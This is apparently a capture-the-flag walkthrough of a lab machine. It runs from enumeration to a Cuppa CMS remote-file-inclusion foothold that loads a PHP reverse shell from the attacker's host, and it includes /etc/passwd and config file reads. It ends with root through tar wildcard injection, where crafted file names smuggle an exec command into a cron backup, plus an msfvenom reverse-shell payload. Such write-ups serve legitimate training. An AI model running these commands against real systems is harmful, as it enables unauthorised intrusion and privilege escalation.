Recon
Network Enum
I ran a nmap scan on the target machine.
- ssh (22): Worth exploring
- http (80): Web server is running
- pop (110): Maybe an email server is running?
- netbios-ssn (139): Worth exploring
- imap (143): Maybe an email server is running?
- microsoft-ds (445): SMB is worth exploring
Web Enum
I ran gobuster to spider the directory in the web server
gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
From the scan result, I see these are directories found:
- /admin
- /css
- /js
- /config
- /ai
- /squirrelmail (this will be interesting to explore)
Most of the directories are restricted.
The squirrelmail page is working but I will need the login credentials.
I don’t have the credentials at the moment. So now the goal is to find out the email credential.
Service Enum
Now I am going to look at the SMB service running at port 445.
I ran the command to connect to the SMB’s anonymous share
smbclient //[TARGET IP]/anonymous
The files look promising to find a clue on how to get the email credentials.
I ran another command to get the content of the SMB share:
smbget -R smb://[TARGET IP]/anonymous
After inspecting the content, I found a list of possible passwords (maybe they belong to Miles?).
Using Burp Intruder, I brute-force the password with username (milesdyson).
Eventually, the password for milesdyson is cyborg007haloterminator
Once I login as milesdyson, I saw a bunch of emails. After reading one of the email, I saw that the SMB password for milesdyson was leaked.
To summarize, these are the found credentials:
Username: milesdyson
Email Password: cyborg007haloterminator
SMB Password: )s{A&2Z=F^n_E.B`
I tried to connect to the SMB milesdyson share with the username and password:
smbclient //[TARGET IP]/milesdyson -U=milesdyson
Then I manage to login to milesdyson share.
At first glance, most of the files are some machine learning pdf.
I went into the notes folder. There are a bunch of markdowns.
But I spotted a textfile named as “important.txt”.
Inside this important.txt file, I saw that milesdyson have a custom CMS with the link “
Spider the directory in the CMS.
Initially I had an issue because I didn’t put the backslash for the URL.
After I have done so, I ran this command:
gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
- /administrator was found.
Navigate to this directory and I can see a CMS named “Cuppa CMS”.
Foothold
To summarize, I found three possible ways to gain a foothold into the system.
- ssh
- squirrelmail
- Cuppa CMS
ssh
I tried to brute-force using hydra with username
hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh
But this does not work.
Squirrelmail
I searched for possible exploits for squirrelmail (version 1.4.23).
There is an interesting exploit for RCE.
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
I followed the steps but the exploit does not work.
Cuppa CMS
I struggle to find the credentials to login to Cuppa CMS (tried with milesdyson credentials to see if password is reused).
I searched for Cuppa CMS exploit and this seems promising
https://www.exploit-db.com/exploits/25971
Basically, we can call a remote file without login to Cuppa CMS.
The examples given in the exploit
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Now I started a python server so that the CMS can call my shell files.
I tried a few ways to execute a shell.
For example, a basic php web shell with CMD param. But this does not work.
I look for more information about the configuration file.
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
It seems like there is a file extension restriction. For example, txt and jpeg are allowed. But php is not allowed.
I tried to create a php reverse shell and then change the magic number of the file to jpeg using hexeditor. This will make the Linux machine interpret the file as a jpeg file.
I started the nc listener.
I ran the command to call the php reverse shell:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php
This works and I have shell to the machine.
Immediately I enter the id
and whoami
command to check what is this account.
This account is “www-data”
I can also find the usr flag in milesdyson home directory
Now I gained a foothold, I will need to escalate privilege.
Privilege Escalation
I tried to use sudo but there is an error. It seems like the shell is “jailed”.
Basically we need to spawn a tty shell. (Link: https://netsec.ws/?p=337)
I used python command to spawn:python -c 'import pty; pty.spawn("/bin/sh")'
Now I can sudo but this seems useless since I don’t know the password of the current user “www-data user”.
Then I ran some Linux enumeration scripts (lse.sh and LinEnum.sh).
It seems like the possible vectors are the crontab and the suid binaries.
I tried with the suid binaries and struggled because of the sudo issue where I don’t know the password. So much time wasted here
So I looked at the crontab. It seems like there is a backup.sh job executed by the root user.
I looked at the content of backup.sh:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So the root user cd into /var/www/html and then perform a backup.
Well I think I am in control of the /var/www/html folder.
I looked at the Linux PE checklist again and found a similar attack vector with the use of wildcard in tar.
https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards
I should follow the exact steps. I observed that I miss out one step.
I created two files:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
Then I created the shell.elf in attacker machine and download in target machine.msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf
Now I started the listener at the correct port and wait.
After a few minutes, there are no connection from target machine.
This is when I took a hint and saw that there is something wrong with my shell file
I changed the command to:
touch "/home/user/--checkpoint-action=exec=sh shell.elf"
This works and I managed to connect as root.
Look for the root.txt under root directories.